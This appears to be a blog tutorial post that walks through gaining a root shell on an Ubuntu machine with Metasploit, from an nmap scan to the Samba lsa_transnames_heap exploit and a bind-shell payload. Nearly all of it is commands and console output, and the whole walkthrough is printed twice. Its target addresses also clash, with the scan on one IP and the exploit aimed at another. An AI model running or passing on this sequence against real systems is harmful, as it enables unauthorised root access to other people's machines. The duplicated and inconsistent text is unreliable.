In my previous tutorial, i was explaining how to exploit an window
machine. So here we will Exploit an Ubuntu Machine.
The steps are
pretty much the same as for the preceding exploit except that we will
select a different payload.
msf > nmap -sT -A -P0 192.168.1.3
Assume we get three open ports: 80, 139, 445 and running a version of
Samba 3.x and Apache 2.2.3 with PHP 5.2.1.
Let’s search for a Samba exploit :
msf > search samba
[*] Searching loaded modules for pattern 'samba'...
Auxiliary
=========
Name Rank Description
---- ---- -----------
admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
Exploits
========
Name Rank Description
---- ---- -----------
linux/samba/lsa_transnames_heap good Samba lsa_io_trans_names . . .
. . . SNIP . . .
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
. . . SNIP . . .
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(lsa_transnames_heap) > exploit
[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffff104e...
[*] Connecting to the SMB service...
. . . SNIP . . .
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.1.3:41551 -> 192.168.1.2:8080)
whoami
root
This type of exploit, called a heap-based attack, takes advantage of
dynamic memory allocation.
machine. So here we will Exploit an Ubuntu Machine.
The steps are
pretty much the same as for the preceding exploit except that we will
select a different payload.
msf > nmap -sT -A -P0 192.168.1.3
Assume we get three open ports: 80, 139, 445 and running a version of
Samba 3.x and Apache 2.2.3 with PHP 5.2.1.
Let’s search for a Samba exploit :
msf > search samba
[*] Searching loaded modules for pattern 'samba'...
Auxiliary
=========
Name Rank Description
---- ---- -----------
admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
Exploits
========
Name Rank Description
---- ---- -----------
linux/samba/lsa_transnames_heap good Samba lsa_io_trans_names . . .
. . . SNIP . . .
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
. . . SNIP . . .
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(lsa_transnames_heap) > exploit
[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffff104e...
[*] Connecting to the SMB service...
. . . SNIP . . .
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.1.3:41551 -> 192.168.1.2:8080)
whoami
root
This type of exploit, called a heap-based attack, takes advantage of
dynamic memory allocation.
No comments:
Post a Comment